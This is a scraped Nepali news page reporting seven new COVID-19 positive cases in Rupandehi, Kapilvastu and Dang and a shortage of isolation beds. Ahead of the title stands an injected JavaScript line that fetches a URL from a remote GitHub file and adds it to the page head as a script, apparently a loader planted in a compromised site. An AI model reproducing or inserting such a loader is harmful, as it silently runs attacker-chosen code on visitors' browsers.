;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ७ जनामा कोरोना पोजेटिभ रूपन्देही, कपिलवस्तु र दाङ – जुनेली न्युज
मङ्लबार, असार ११, २०८२
  • होमपेज
  • ७ जनामा कोरोना पोजेटिभ रूपन्देही, कपिलवस्तु र दाङ
समाचार

७ जनामा कोरोना पोजेटिभ रूपन्देही, कपिलवस्तु र दाङ

१० जेठ

बुटवल । रुपन्देही, कपिलवस्तु र दाङका सातजनामा शनिबार कोरोना पोजेटिभ देखिएको छ । प्रदेश जनस्वास्थ्य प्रयोगशाला भैरहवामा गरिएको पीसीआर परीक्षणमा सात जनामा कोरोना पोजेटिभ देखिएको हो ।

सात जनामध्ये दाङ घर भएका ३३ वर्षका पुरुष गुल्मी मदानेका कोरोना संक्रमितको घरमा कोठा भाडामा बस्दै आएका व्यक्ति हुन् । उनी मदानेकै एक बैंकका कर्मचारी हुन् ।

रुपन्देहीको तीनजना गैडहवा गाउँपालिकाका हुन् भने कपिलवस्तुका तीनजना मायादेवी गाउपालिकाका हुन् । उनीहरु ६ जना २० देखि ४० वर्षका पुरुषहरु रहेका प्रयोगशालाका निमित्त प्रमुख राजेन्द्र गिरीले बताए ।

गैडहवा गाउँपालिकामा शुक्रबार मात्रै ७ जनामा कोरोना पाजेटिभ देखिएको थियो । उक्त पालिकामा संक्रमितको संख्या २० जना पुगेको छ ।

पालिकाहरुमा कोरोना संक्रमित बढेसंगै उनीहरुलाई थप उपचारका लागि राख्ने आइसोलेसन बेड नहुँदा समस्या भएको गैडहवा गाउँपालिकाका अध्यक्ष बच्चुलाल केवटले बताए । भैरहवाको भीम अस्पताल र बुटवलको धागो कारखानाका आइसोलेसन बेड बिरामीले भरिएकाले नयां संक्रमितलाई राख्ने ठाउं नभएको उनले गुनासो गरे ।

फेसबुक प्रतिक्रियाहरु